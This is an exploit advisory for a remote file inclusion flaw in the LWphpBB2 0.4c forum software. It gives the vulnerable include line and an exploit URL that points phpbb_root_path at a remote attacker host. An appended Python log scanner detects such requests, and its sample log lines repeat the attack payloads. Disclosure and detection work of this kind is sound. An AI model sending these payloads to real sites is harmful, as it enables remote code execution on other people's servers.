LWphpBB2 version 0.4c suffers from a remote file inclusion vulnerability.
e33e569ff829f7ce60fdc6bf087928db8aa872ca773e01560a6fce63809700a9
**********************************
*AuThor:Silitoad *
*emA!l:Silitoad[at]hotmail[dot]Com *
*HoMePaGe: http://www.Arabian-FighterZ.com *
**********************************
[Info]
LWphpBB2
Version: 0.4c
Problem: Full path disclosure, Include file
bug: include($phpbb_root_path . 'includes/classes_cash.
[Vuls]
1.Full path disclosure:
[Exploit]
http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt
?
[Fix]
Vuls have been reported to the author, no reply yet.
[Greetings]
Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,linux_m,Diabolax,leo,stoorm, ......
eof
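
Since no vendor fix is listed, one way to find attempts against this parameter is to scan web server access logs for requests that pass a remote URL in `phpbb_root_path`. This is an added example, not part of the original advisory; the function name `rfi_hits`, the log lines and the host `host.example` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Value starts with a URL scheme or PHP stream wrapper instead of a local path.
REMOTE = re.compile(r'^\s*(?:https?|ftps?|php)://|^\s*data:', re.I)
# Request field of a common/combined log format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def rfi_hits(log_lines, param="phpbb_root_path"):
    """Return (client_ip, path, value) for requests passing a remote URL in `param`."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # parse_qsl percent-decodes once; PHP variable names are case-sensitive.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            value = unquote(value)  # second decode catches double-encoded values
            if name == param and REMOTE.match(value):
                hits.append((line.split(" ", 1)[0], target.path, value))
    return hits

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Apr/2007:14:30:02 +0000] '
    '"GET /LWphpBB2_0.4c/LWphpBB20.4/viewtopic.php?t=12 HTTP/1.1" 200 8120',
    '198.51.100.7 - - [23/Apr/2007:14:38:51 +0000] '
    '"GET /LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php'
    '?phpbb_root_path=http://host.example/x.txt? HTTP/1.0" 200 1043',
    '198.51.100.7 - - [23/Apr/2007:14:39:10 +0000] '
    '"GET /LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php'
    '?phpbb_root_path=http%253A%252F%252Fhost.example%252Fx.txt HTTP/1.0" 200 1043',
    '192.0.2.10 - - [23/Apr/2007:14:41:00 +0000] '
    '"GET /LWphpBB2_0.4c/LWphpBB20.4/index.php?phpbb_root_path=./ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, path, value in rfi_hits(SAMPLE_LOG):
        print(f"{ip} -> {path} phpbb_root_path={value!r}")
```

A hit on a file under `includes/` also indicates that the script is directly reachable from the web, which it should not be.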